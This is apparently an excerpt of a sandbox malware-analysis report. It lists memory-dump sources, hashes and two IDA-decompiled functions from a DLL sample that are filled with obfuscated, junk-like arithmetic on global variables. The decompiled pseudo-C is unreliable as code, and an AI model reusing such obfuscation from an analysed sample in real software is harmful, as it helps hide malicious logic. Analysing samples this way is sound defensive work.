                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: db6ca8fb41c8cf6cd69c8ef76619ea67670e755baa92d9266841555edbf901a7
                                • Instruction ID: 71642d64cf547fec34b6d633e287e3f4ec6dda4b21826decc55a12b476245e61
                                • Opcode Fuzzy Hash: db6ca8fb41c8cf6cd69c8ef76619ea67670e755baa92d9266841555edbf901a7
                                • Instruction Fuzzy Hash: 3762E972A08EA985E764CF1AF84027977B1FB98B65F214136DA8D63764DF3CE060CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FB370 Relevance: .3, Instructions: 345COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E00007FFC7FFC130FB370(signed int __rax, void* __rcx, void* __rdx, long long __r8, long long __r9, signed int __r15) {
				signed int _t222;
				signed short _t225;
				intOrPtr _t229;
				long long _t234;
				signed int _t235;
				signed int _t242;
				signed int _t250;
				signed int _t256;
				signed char _t257;
				signed int _t262;
				signed int _t281;
				signed int _t285;
				signed long long _t286;
				signed int _t288;
				signed int _t328;
				void* _t330;
				signed long long _t346;
				intOrPtr _t347;
				signed int _t348;
				signed long long _t350;
				signed long long _t353;
				signed long long _t355;
				intOrPtr _t356;
				intOrPtr _t357;
				signed long long _t359;
				intOrPtr _t369;
				signed long long _t374;
				signed long long _t377;
				signed long long _t378;
				intOrPtr _t379;
				intOrPtr _t386;
				intOrPtr _t387;
				signed long long _t388;
				signed long long _t394;
				signed int _t399;
				signed long long _t403;
				signed long long _t404;
				signed long long _t405;
				signed long long _t407;
				signed long long _t410;
				intOrPtr _t414;
				signed int _t418;
				signed long long _t419;
				signed long long _t423;
				signed int _t429;
				signed long long _t431;
				signed long long _t433;
				signed int _t437;
				signed int _t443;
				void* _t445;
				signed long long _t446;
				void* _t448;
				signed int* _t449;
				long long _t451;
				long long _t452;
				signed long long _t456;
				signed int _t461;
				signed long long _t464;
				signed long long _t465;
				signed int _t466;
				signed int* _t468;
				signed long long _t469;
				signed long long _t470;
				signed long long _t472;
				signed long long _t476;
				signed int _t481;

				_t451 = __r8;
				 *((long long*)(_t448 + 0x20)) = __r9;
				 *((long long*)(_t448 + 0x18)) = __r8;
				_push(_t445);
				_push(_t476);
				_t449 = _t448 - 0x60;
				_t469 =  *0x131241a0; // 0x0
				_t461 =  *0x13124180; // 0x0
				r8d = __rcx + 1;
				r14d =  *0x13124158 & 0x000000ff;
				r13d = 0x3c2;
				_t456 = _t449[0x32];
				_t449[0x2a] =  *(__r9 + _t469 * 4) & 0x0000ffff ^ r10d;
				_t470 = _t469 - 1;
				_t449[8] = __rax;
				 *0x13124130 = ( *0x13124130 & 0x0000ffff) + 1;
				_t449[0xe] =  *0x13124134;
				_t449[4] = _t461;
				 *0x13124180 = _t461 - 1;
				_t449[0xa] =  *((intOrPtr*)(__r8 +  *0x13124168 * 4));
				 *0x131241a0 = _t470;
				_t437 = ( *0x13124120 & 0x0000ffff) - r8d;
				r8d = r8d - 1;
				_t449[0x10] = _t437;
				_t328 = ( *0x13124122 & 0x000000ff) +  *((intOrPtr*)(__r8 + (_t470 + _t470 * 2) * 4));
				_t346 = r8d;
				_t449[2] = _t346;
				_t347 =  *0x13124128; // 0x0
				_t464 = _t346 | 0x00001de4;
				_t449[1] = _t328;
				_t449[6] = _t464;
				_t449[0x28] =  *(_t347 + _t470 * 8) & 0x000000ff;
				_t222 =  *0x13124124; // 0x0
				 *((intOrPtr*)(__r8 + (_t222 + _t222) * 4)) =  *((intOrPtr*)(__r8 + (__r8 + 1) * 4));
				_t225 = __r8 - 1;
				 *_t449 = _t225;
				_t348 =  *0x131241a0; // 0x0
				 *0x131241a0 = _t348 + 1;
				_t399 = __rdx + _t456 * 8;
				 *((short*)(0x35d9 + _t456 * 2)) = ((_t225 ^ 0x00000a54) &  *(__rdx + 0x7d8)) -  *((intOrPtr*)(0x35d9 + _t456 * 2));
				_t350 =  *0x13124198; // 0x0
				_t449[0xc] = _t399;
				if ( *_t399 - _t350 <= 0) goto 0x130fb992;
				_t330 =  *0x1312414c - r8d; // 0x0
				_t449[0x16] = __r15;
				_t481 = _t449[0x30];
				if (_t330 > 0) goto 0x130fb5f6;
				_t229 =  *0x13124148; // 0x0
				if (_t449[4] !=  *((intOrPtr*)(__r8 + (_t229 + _t229) * 4))) goto 0x130fb5f6;
				if (_t449[0xa] - 0x18b2 > 0) goto 0x130fb5f6;
				r8d =  *0x13124124; // 0x0
				_t46 = _t451 + 4; // 0x4
				if ( *((intOrPtr*)(_t464 + _t46 * 4)) - ( *(__r9 + _t456 * 4 * 2) & 0x0000ffff) <= 0) goto 0x130fb5f6;
				_t465 = _t449[0x2a];
				if (_t328 -  *((intOrPtr*)(_t437 + _t465 * 4)) <= 0) goto 0x130fb67f;
				 *0x13124194 =  *0x13124194 - 1;
				_t54 = _t445 + 0xd; // 0x3cf
				_t403 = _t54;
				 *(_t481 + _t403 * 4) =  *_t449;
				_t234 =  *0x13124150; // 0x0
				 *((intOrPtr*)(__r8 + _t403 * 8)) = _t234;
				_t235 =  *0x13124168; // 0x0
				asm("cdq");
				 *(__r9 + _t465 * 2) = _t235 / ( *(__r9 + _t465 * 2) & 0x0000ffff);
				_t285 =  *0x13124168; // 0x0
				_t286 = _t285 + 1;
				_t353 = _t286;
				 *0x13124168 = _t286 + 1;
				_t288 =  *0x13124120 & 0x0000ffff;
				 *0x13124198 = _t353;
				 *0x13124123 =  *0x13124123 | ( *(__r9 + 0x13ec) & 0x000000ff) + _t288;
				 *0x13124120 = _t288 + 1;
				_t404 =  *0x13124170; // 0x0
				_t405 = _t404 - 1;
				 *0x13124170 = _t405;
				 *(_t449[0xc]) = _t353 | _t456;
				goto 0x130fb98d;
				_t355 =  *0x131241a0; // 0x0
				_t242 =  *0x13124168; // 0x0
				_t407 = _t242 + 4;
				_t356 =  *0x13124140; // 0x0
				 *((intOrPtr*)(__r9 + _t355 * 2)) =  *((intOrPtr*)(__r9 + _t355 * 2)) + ( *(_t356 + _t407 * 4) & 0x0000ffff);
				_t357 =  *0x131241a8; // 0x0
				 *(_t357 + 0x3c2) =  *(_t357 + 0x3c2) ^ 0x00000080;
				 *0x131241a0 =  *0x131241a0 & _t407;
				 *0x13124148 = 0x158d % _t405 + 1;
				 *(_t481 + _t456 * 4) =  *(_t481 + _t456 * 4) ^ 0x00001de7;
				_t429 = _t456 * 4;
				 *(_t429 + _t429 + 0x35d9) =  *(_t429 + _t429 + 0x35d9) ^ ( *(__r8 + _t449[2] * 4) & 0x0000ffff) * 0x00000c36;
				r8d =  *0x13124124; // 0x0
				goto 0x130fb689;
				_t466 = _t449[6];
				_t99 = _t451 + 2; // 0x2
				r9d = r9d - 1;
				_t359 =  *((intOrPtr*)(_t437 + _t99 * 4));
				if ( *((intOrPtr*)(__rdx + _t456 * 8)) - _t359 <= 0) goto 0x130fb786;
				r14b = r14b + (( *0x4135 & 0x000000ff) * ( *0x13124123 & 0x000000ff) & 0x000000ff) * 0x63;
				_t410 = _t429 + _t429;
				_t250 =  *0x13124134; // 0x0
				 *(_t481 + _t410 * 4) =  *(_t481 + _t410 * 4) & _t250;
				 *(__rdx + _t410 * 8) =  *(__rdx + _t359 * 8) * 0x674;
				_t452 =  *0x13124150; // 0x0
				 *0x13124150 = _t452 +  *((intOrPtr*)(_t466 + 0x4b84));
				 *0x13124180 =  *(_t466 + 0x585c) & _t449[4];
				_t256 =  *(_t481 + _t456 * 4 * 4) & 0x0000ffff ^ r8w;
				 *0x13124190 =  *0x13124190 + _t256;
				_t257 = _t256 /  *0x13124194;
				_t414 =  *0x131241a8; // 0x0
				 *0x13124194 = _t257;
				 *(_t414 + _t449[0xe] + 4) =  *(_t414 + _t449[0xe] + 4) & _t257;
				 *((intOrPtr*)(_t481 + _t449[2] * 4)) =  *(_t481 + _t449[2] * 4) * ( *0x13124123 & 0x000000ff);
				goto 0x130fb78b;
				_t446 = _t328;
				_t449[0x32] = 0x52;
				_t472 =  *((intOrPtr*)(_t481 + (2 + ( *(__rdx +  *0x13124124 * 8) ^ r9d) * 2) * 4));
				_t394 = _t472;
				if (_t472 - _t446 < 0) goto 0x130fb899;
				r14b = r14b + 0xff;
				_t468 = __rdx + r9d * 8 + 8;
				_t262 =  *((__rdx + _t449[0x2a] * 8) * 4 + _t449[6]);
				asm("cdq");
				 *((_t394 << 4) + _t481 + 0x10 - 0x10) =  *((_t394 << 4) + _t481 + 0x10 - 0x10) & _t262 % r11d;
				_t369 =  *0x13124128; // 0x0
				 *0x13124133 =  *0x13124133 |  *(_t369 + 0x4134) & 0x000000ff;
				_t431 = r11d;
				r11d = r11d + 1;
				 *(_t449[0x10] + 0x5c + _t446 * 8) = _t262 / r11d /  *(_t449[0x10] + 0x5c + _t446 * 8);
				_t418 =  *0x131241a0; // 0x0
				_t419 = _t418 + _t418;
				_t374 = _t431 -  *(__rdx + _t419 * 8);
				 *(__rdx + _t419 * 8) = _t374;
				 *_t468 =  *_t468 & _t374;
				 *0x13124194 =  *0x13124194 + 1;
				r13d = 0xfb - r13d;
				 *_t468 =  *_t468 * _t431;
				if (_t394 + 1 - _t446 >= 0) goto 0x130fb7e0;
				_t443 = _t449[0x2c];
				_t377 =  *0x13124178; // 0x0
				 *(_t449[8] + _t377 * 4) =  *(_t377 + 0x2f1c) & 0x0000ffff;
				_t378 =  *0x131241a0; // 0x0
				 *0x13124194 = 0x8b9 %  *0x13124198;
				_t379 =  *0x131241a8; // 0x0
				 *((intOrPtr*)(_t443 + _t378 * 4 + 0x20)) = ( *(_t379 + 0x9ee) & 0x000000ff) -  *((intOrPtr*)(_t443 + _t378 * 4 + 0x20));
				 *((intOrPtr*)(_t443 + (_t449[1] + 1) * 4)) = 0x134 -  *((intOrPtr*)(_t443 + (_t449[1] + 1) * 4));
				 *((intOrPtr*)(_t449[0x2e] + _t449[0x2a] * 2)) = r13w;
				_t423 = _t476 * 4;
				_t433 =  *((intOrPtr*)(_t443 + _t423 * 4));
				if (_t433 != _t423) goto 0x130fb94e;
				 *((_t433 << 4) + 0xc + _t443) =  *((_t433 << 4) + 0xc + _t443) & _t449[0x32];
				if (_t433 + 1 == _t423) goto 0x130fb940;
				_t386 =  *0x13124188; // 0x0
				 *0x13124194 = 0xfffff211;
				_t387 =  *0x13124140; // 0x0
				 *0x13124123 =  *(_t386 + 0x1cd0) & 0x000000ff;
				_t388 =  *0x13124180; // 0x0
				 *0x13124180 = _t388 *  *(_t387 +  *_t449 * 4);
				_t281 =  *0x13124168; // 0x0
				return _t281;
			}





































































                                0x7ffc130fb370
                                0x7ffc130fb370
                                0x7ffc130fb375
                                0x7ffc130fb37b
                                0x7ffc130fb380
                                0x7ffc130fb384
                                0x7ffc130fb388
                                0x7ffc130fb392
                                0x7ffc130fb399
                                0x7ffc130fb3a7
                                0x7ffc130fb3b7
                                0x7ffc130fb3bd
                                0x7ffc130fb3c8
                                0x7ffc130fb3cf
                                0x7ffc130fb3d9
                                0x7ffc130fb3e1
                                0x7ffc130fb3ef
                                0x7ffc130fb3fb
                                0x7ffc130fb403
                                0x7ffc130fb40e
                                0x7ffc130fb41d
                                0x7ffc130fb424
                                0x7ffc130fb427
                                0x7ffc130fb42e
                                0x7ffc130fb433
                                0x7ffc130fb436
                                0x7ffc130fb43c
                                0x7ffc130fb441
                                0x7ffc130fb448
                                0x7ffc130fb44f
                                0x7ffc130fb453
                                0x7ffc130fb460
                                0x7ffc130fb46e
                                0x7ffc130fb47c
                                0x7ffc130fb47f
                                0x7ffc130fb483
                                0x7ffc130fb48b
                                0x7ffc130fb495
                                0x7ffc130fb4a8
                                0x7ffc130fb4b5
                                0x7ffc130fb4be
                                0x7ffc130fb4c5
                                0x7ffc130fb4cd
                                0x7ffc130fb4d3
                                0x7ffc130fb4da
                                0x7ffc130fb4df
                                0x7ffc130fb4e7
                                0x7ffc130fb4ed
                                0x7ffc130fb501
                                0x7ffc130fb510
                                0x7ffc130fb516
                                0x7ffc130fb528
                                0x7ffc130fb537
                                0x7ffc130fb53d
                                0x7ffc130fb549
                                0x7ffc130fb54f
                                0x7ffc130fb555
                                0x7ffc130fb55b
                                0x7ffc130fb561
                                0x7ffc130fb564
                                0x7ffc130fb572
                                0x7ffc130fb57a
                                0x7ffc130fb580
                                0x7ffc130fb585
                                0x7ffc130fb58a
                                0x7ffc130fb590
                                0x7ffc130fb592
                                0x7ffc130fb59e
                                0x7ffc130fb5a6
                                0x7ffc130fb5ad
                                0x7ffc130fb5c0
                                0x7ffc130fb5cb
                                0x7ffc130fb5d2
                                0x7ffc130fb5d9
                                0x7ffc130fb5df
                                0x7ffc130fb5ee
                                0x7ffc130fb5f1
                                0x7ffc130fb5f6
                                0x7ffc130fb601
                                0x7ffc130fb60f
                                0x7ffc130fb612
                                0x7ffc130fb61d
                                0x7ffc130fb620
                                0x7ffc130fb627
                                0x7ffc130fb642
                                0x7ffc130fb651
                                0x7ffc130fb657
                                0x7ffc130fb663
                                0x7ffc130fb66e
                                0x7ffc130fb676
                                0x7ffc130fb67d
                                0x7ffc130fb67f
                                0x7ffc130fb689
                                0x7ffc130fb68d
                                0x7ffc130fb693
                                0x7ffc130fb69e
                                0x7ffc130fb6c9
                                0x7ffc130fb6cc
                                0x7ffc130fb6cf
                                0x7ffc130fb6d5
                                0x7ffc130fb6ee
                                0x7ffc130fb6f9
                                0x7ffc130fb703
                                0x7ffc130fb71f
                                0x7ffc130fb736
                                0x7ffc130fb73d
                                0x7ffc130fb759
                                0x7ffc130fb75c
                                0x7ffc130fb768
                                0x7ffc130fb76e
                                0x7ffc130fb780
                                0x7ffc130fb784
                                0x7ffc130fb791
                                0x7ffc130fb794
                                0x7ffc130fb7a5
                                0x7ffc130fb7a9
                                0x7ffc130fb7af
                                0x7ffc130fb7e0
                                0x7ffc130fb7e4
                                0x7ffc130fb7fb
                                0x7ffc130fb7ff
                                0x7ffc130fb803
                                0x7ffc130fb809
                                0x7ffc130fb817
                                0x7ffc130fb831
                                0x7ffc130fb834
                                0x7ffc130fb837
                                0x7ffc130fb83e
                                0x7ffc130fb845
                                0x7ffc130fb848
                                0x7ffc130fb84c
                                0x7ffc130fb863
                                0x7ffc130fb86b
                                0x7ffc130fb874
                                0x7ffc130fb87e
                                0x7ffc130fb884
                                0x7ffc130fb891
                                0x7ffc130fb899
                                0x7ffc130fb8b7
                                0x7ffc130fb8c8
                                0x7ffc130fb8cf
                                0x7ffc130fb8d9
                                0x7ffc130fb8ee
                                0x7ffc130fb8fe
                                0x7ffc130fb911
                                0x7ffc130fb91e
                                0x7ffc130fb921
                                0x7ffc130fb930
                                0x7ffc130fb940
                                0x7ffc130fb94c
                                0x7ffc130fb94e
                                0x7ffc130fb955
                                0x7ffc130fb966
                                0x7ffc130fb96d
                                0x7ffc130fb97b
                                0x7ffc130fb986
                                0x7ffc130fb992
                                0x7ffc130fb9a6

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9183cfed9594700024813088ad83315804a1e0c59a4b8eba35b8c92b38daba53
                                • Instruction ID: fe34e2276490208513ea4b68cc40a2090d0d41eb2fd55ab065a32a08e94d5209
                                • Opcode Fuzzy Hash: 9183cfed9594700024813088ad83315804a1e0c59a4b8eba35b8c92b38daba53
                                • Instruction Fuzzy Hash: 2E027F76A09EA986E714CF16E8806797BB4FB58759F214136DA8DA3324DF3CE120CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F8D50 Relevance: .3, Instructions: 341COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E00007FFC7FFC130F8D50(signed int __ebx, void* __ecx, signed int __edi, long long __rbx, signed int __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, signed int _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40) {
				signed int _t208;
				signed int _t214;
				signed int _t219;
				signed int _t221;
				signed int _t239;
				void* _t340;
				void* _t341;
				void* _t344;
				intOrPtr _t352;
				intOrPtr _t368;
				intOrPtr _t374;
				intOrPtr _t378;
				signed long long _t380;
				intOrPtr _t381;
				signed long long _t382;
				intOrPtr _t383;
				intOrPtr _t386;
				signed long long _t388;
				intOrPtr _t391;
				signed long long _t394;
				signed long long _t404;
				signed long long _t405;
				void* _t406;
				signed long long _t407;
				void* _t413;
				void* _t417;
				signed long long _t418;
				signed long long _t420;
				signed long long _t421;
				signed long long _t422;
				void* _t429;
				signed long long _t430;
				void* _t436;
				signed long long _t442;
				signed long long _t451;
				signed long long _t453;
				signed long long _t456;
				signed long long _t461;
				signed long long _t462;
				signed long long _t466;
				signed long long _t476;
				intOrPtr _t479;
				signed int* _t480;
				intOrPtr _t481;
				intOrPtr _t482;
				intOrPtr _t483;

				_t436 = __r8;
				_t413 = __rdx;
				_a24 = __rbx;
				_a32 = __rbp;
				_t3 = _t413 - 1; // 0x38
				_t481 = _a40;
				_t5 = _t436 + 1; // 0x1
				_t429 = _t5;
				_t476 =  *0x131241a0; // 0x0
				r13d = 0x13f3;
				_a8 =  *0x1312416c & 0x0000ffff;
				r15d = __ebx & 0x0000ffff;
				r15w = r15w + r15w;
				_a16 = _t476 + __rcx;
				r11d =  *(__r9 +  *0x13124148 * 8);
				r11d = r11d - __ebx;
				if ( *((long long*)(_t481 + ( *_t480 +  *_t480) * 8)) - 0x1786 < 0) goto 0x130f8dd6;
				if (0x1d27 -  *0x13124194 - 0x13a3 > 0) goto 0x130f8f05;
				_t352 =  *0x13124138; // 0x0
				_t430 = _t429 + 1;
				if ( *((intOrPtr*)(_t352 + 0x80 + _t430 * 8)) - _t429 > 0) goto 0x130f8f05;
				if (_t352 != __rcx) goto 0x130f8f05;
				 *0x13124124 =  *0x13124124 + r8d;
				 *_t480 =  *_t480 - 1;
				_t208 =  *_t480 + 7;
				_t461 = _t208 +  *0x131241a8;
				 *_t461 = ( *_t461 & 0x000000ff) * ((_t208 % r11d & 0x000000ff) * 0x00000033 & 0x000000ff);
				 *0x131241a0 =  *0x13124148;
				 *(0x13f3 +  *_t480 * 4) =  *(0x13f3 +  *_t480 * 4) | 0x000005a1;
				_t214 =  *0x13124124; // 0x0
				_t417 = _t214 + 5;
				r9d =  *(_t417 + _t417 + 0x1c6a) & 0x0000ffff;
				_t340 = _t461 -  *0x13124180; // 0x0
				if (_t340 > 0) goto 0x130f8f05;
				asm("o16 nop [eax+eax]");
				r8d =  *0x13124133 & 0x000000ff;
				 *0x13124133 = 0x1625 % r8d;
				_t219 =  *( *0x1312414c +  *0x1312414c + 0x1c6a) & 0x0000ffff ^ r11d;
				asm("cdq");
				r9d = r9d + 1;
				 *((intOrPtr*)(0x13f3 + _t461 * 8 + 8 - 8)) =  *((intOrPtr*)(0x13f3 + _t461 * 8 + 8 - 8)) + _t219 % r9d;
				_t341 = r9d -  *0x13124180; // 0x0
				if (_t341 <= 0) goto 0x130f8ec0;
				_t462 =  *0x13124170; // 0x0
				_t221 = _t219 / r9d /  *(0x13f3 + _t462 * 4);
				 *(0x13f3 + _t462 * 4) = _t221;
				_t442 = __r9 +  *_t480 * 8;
				 *_t442 = _t417;
				_t368 =  *0x13124160; // 0x0
				r8d =  *(_t368 + 0x1e6a) & 0x000000ff;
				_t418 =  *0x13124194;
				r8d = r8d -  *0x13124148;
				 *0x13124148 = r8d;
				 *0x13124133 = ( *0x13124133 & 0x000000ff) * ((_t221 /  *_t442 / _t442 * ( *(_t481 + 0x4968) | _t418) % _t430 ^ 0x0000004d) & 0x000000ff);
				 *((long long*)(__r9 +  *_t480 * 8)) = 0x177c;
				r10d =  *(0x13f3 +  *_t480 * 4);
				_t374 =  *0x13124188; // 0x0
				if (r10d -  *((intOrPtr*)(_t374 + 0x35f0)) >= 0) goto 0x130f9075;
				r13d =  *0x13124134; // 0x0
				r11d =  *0x13124124; // 0x0
				_t482 =  *0x13124188; // 0x0
				 *0x1312414c = __ebx;
				asm("o16 nop [eax+eax]");
				r11d = r11d | r13d;
				 *0x13124124 = r11d;
				r15w = r15w + __ecx;
				r10d = r10d + 1;
				 *0x131241a0 = _t418;
				if (r10d -  *((intOrPtr*)(_t482 + 0x35f0)) < 0) goto 0x130f9020;
				_t483 = _a40;
				r13d = 0x13f3;
				_t479 = _a16;
				r8d = _a8;
				r8d = r8d + 1;
				_t420 = _t418 -  *(__r9 + __rcx * 8) + 0x1df2;
				 *(__r9 + __rcx * 8) = _t420;
				_t404 = __rcx + 1;
				_t378 =  *0x13124138; // 0x0
				r8d = r15w & 0xffffffff;
				asm("cdq");
				_t344 =  *0x13124134 -  *0x849b; // 0x0
				if (_t344 < 0) goto 0x130f9129;
				_t239 =  *0x13124148; // 0x0
				_t451 =  *0x13124180; // 0x0
				_t380 = _t420;
				_t421 =  *0x13124178; // 0x0
				 *((short*)(_t421 + (_t3 + 1 - 1 + 1) * 2)) = (_t239 + _t239) / (_t451 - __rcx * (_t3 + 1 - 1)) / _t430;
				_t422 = _t421 ^ _t380;
				 *(_t479 + _t380 * 8) = _t422;
				goto 0x130f919e;
				_t381 =  *0x13124128; // 0x0
				if ( *((intOrPtr*)(_t381 + _t404 * 8)) == 0x1853) goto 0x130f92df;
				_t453 =  *_t480;
				_t382 =  *0x1312414c;
				if ( *((intOrPtr*)(__r9 + _t453 * 8)) == _t382) goto 0x130f92df;
				_t146 = _t453 + 1; // 0x1002
				 *_t480 = _t146;
				 *(_t483 + _t382 * 8) = _t422;
				_t383 =  *0x13124138; // 0x0
				 *((long long*)(_t383 + ( *_t480 + 0x14) * 8)) = _t383 -  *((intOrPtr*)(_t479 + _t404 * 8)) -  *((intOrPtr*)(_t383 + ( *_t480 + 0x14) * 8));
				_t405 = _t404 + 1;
				_t386 =  *0x13124178; // 0x0
				r10d = ( *(_t378 + 0x7c28) * __ebx | __edi) * r8d % r8d + 0x00000001 & 0x0000ffff;
				if (r10d - ( *(_t386 + 0x3088) & 0x0000ffff) <= 0) goto 0x130f929d;
				_t406 = _t405 + 1;
				_t466 = r10d;
				_t388 = _t406 -  *0x13124180;
				 *0x13124180 = _t388;
				 *0x13124123 = (r10b & 0xffffffff) - (((0x891ac73b * r10d >> 0x00000020) + r10d >> 0x0000000a) + ((0x891ac73b * r10d >> 0x00000020) + r10d >> 0x0000000a >> 0x0000001f) & 0x000000ff) * 0x00000078 | r10b;
				 *(_t479 + _t388 * 8) =  *(__r9 + _t466 * 8) + 0x00000eba ^ _t466;
				_t456 =  *_t480;
				if ( *((intOrPtr*)(__r9 + _t456 * 8)) - _t388 < 0) goto 0x130f9246;
				 *(__r9 + _t466 * 8) = _t466;
				 *0x13124123 =  *0x13124123 |  *0x13124130 & 0x000000ff;
				goto 0x130f9283;
				_t174 = _t456 + 1; // 0x1002
				_t407 = _t406 - 1;
				 *_t480 = _t174;
				 *((_t405 << 5) + _t483 + 0x20) =  *((_t405 << 5) + _t483 + 0x20) &  *(_t483 + _t388 * 8);
				 *0x13124148 = _t388 %  *0x13124148;
				 *((long long*)(__r9 +  *_t480 * 8)) = _t466 -  *((intOrPtr*)(_t483 + _t407 * 8)) -  *((intOrPtr*)(__r9 +  *_t480 * 8));
				_t391 =  *0x13124178; // 0x0
				r10d = r10d + 1;
				if (r10d - ( *(_t391 + 0x3088) & 0x0000ffff) > 0) goto 0x130f91c3;
				_t394 = ( *0x13124194 | _t430) - 0x176d;
				 *(_t483 + 8 + _t407 * 8) =  *(_t483 + 8 + _t407 * 8) ^ _t394;
				 *((long long*)(__r9 + _t394 * 8)) = ( *(__r9 +  *0x1312414c * 8) ^ _t430) +  *0x1312414c -  *((intOrPtr*)(__r9 + _t394 * 8)) + 0xa8b;
				return __ebx;
			}

















































                                0x7ffc130f8d50
                                0x7ffc130f8d50
                                0x7ffc130f8d50
                                0x7ffc130f8d55
                                0x7ffc130f8d6b
                                0x7ffc130f8d6f
                                0x7ffc130f8d74
                                0x7ffc130f8d74
                                0x7ffc130f8d78
                                0x7ffc130f8d7f
                                0x7ffc130f8d85
                                0x7ffc130f8d93
                                0x7ffc130f8d97
                                0x7ffc130f8d9b
                                0x7ffc130f8da3
                                0x7ffc130f8dae
                                0x7ffc130f8dbe
                                0x7ffc130f8dd0
                                0x7ffc130f8dd6
                                0x7ffc130f8ddd
                                0x7ffc130f8de8
                                0x7ffc130f8df8
                                0x7ffc130f8e20
                                0x7ffc130f8e27
                                0x7ffc130f8e36
                                0x7ffc130f8e43
                                0x7ffc130f8e72
                                0x7ffc130f8e7e
                                0x7ffc130f8e89
                                0x7ffc130f8e94
                                0x7ffc130f8e9d
                                0x7ffc130f8ea0
                                0x7ffc130f8ea9
                                0x7ffc130f8eb0
                                0x7ffc130f8eba
                                0x7ffc130f8ec0
                                0x7ffc130f8edd
                                0x7ffc130f8eeb
                                0x7ffc130f8eee
                                0x7ffc130f8ef2
                                0x7ffc130f8ef5
                                0x7ffc130f8efc
                                0x7ffc130f8f03
                                0x7ffc130f8f05
                                0x7ffc130f8f26
                                0x7ffc130f8f2b
                                0x7ffc130f8f37
                                0x7ffc130f8f4c
                                0x7ffc130f8f51
                                0x7ffc130f8f58
                                0x7ffc130f8f6a
                                0x7ffc130f8f99
                                0x7ffc130f8fa3
                                0x7ffc130f8fb7
                                0x7ffc130f8fc1
                                0x7ffc130f8fcd
                                0x7ffc130f8fd5
                                0x7ffc130f8fe3
                                0x7ffc130f8ff0
                                0x7ffc130f8ffe
                                0x7ffc130f9005
                                0x7ffc130f9010
                                0x7ffc130f9016
                                0x7ffc130f9029
                                0x7ffc130f902f
                                0x7ffc130f9039
                                0x7ffc130f903d
                                0x7ffc130f9052
                                0x7ffc130f9063
                                0x7ffc130f9065
                                0x7ffc130f906a
                                0x7ffc130f9070
                                0x7ffc130f9075
                                0x7ffc130f9086
                                0x7ffc130f9093
                                0x7ffc130f909a
                                0x7ffc130f909e
                                0x7ffc130f90a1
                                0x7ffc130f90b7
                                0x7ffc130f90bb
                                0x7ffc130f90c6
                                0x7ffc130f90ce
                                0x7ffc130f90d0
                                0x7ffc130f90e8
                                0x7ffc130f90f5
                                0x7ffc130f90fd
                                0x7ffc130f9104
                                0x7ffc130f9115
                                0x7ffc130f9123
                                0x7ffc130f9127
                                0x7ffc130f9129
                                0x7ffc130f9137
                                0x7ffc130f913d
                                0x7ffc130f9141
                                0x7ffc130f914c
                                0x7ffc130f9154
                                0x7ffc130f9158
                                0x7ffc130f916f
                                0x7ffc130f917c
                                0x7ffc130f9198
                                0x7ffc130f919b
                                0x7ffc130f919e
                                0x7ffc130f91a5
                                0x7ffc130f91b3
                                0x7ffc130f91c3
                                0x7ffc130f91c6
                                0x7ffc130f91d0
                                0x7ffc130f91d7
                                0x7ffc130f9202
                                0x7ffc130f921e
                                0x7ffc130f9222
                                0x7ffc130f9231
                                0x7ffc130f9233
                                0x7ffc130f923e
                                0x7ffc130f9244
                                0x7ffc130f9246
                                0x7ffc130f924a
                                0x7ffc130f924d
                                0x7ffc130f925a
                                0x7ffc130f926d
                                0x7ffc130f927f
                                0x7ffc130f9283
                                0x7ffc130f928a
                                0x7ffc130f9297
                                0x7ffc130f92a7
                                0x7ffc130f92ad
                                0x7ffc130f92dc
                                0x7ffc130f92f5

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fe9a542d13f22d74058ef6739bbca4133ff2f70eff9c3a9ebad88dc985c74bd6
                                • Instruction ID: 1f179a8c17ef80c191ec74cca7e5a897f172d741ebe04c54119db0aee295e257
                                • Opcode Fuzzy Hash: fe9a542d13f22d74058ef6739bbca4133ff2f70eff9c3a9ebad88dc985c74bd6
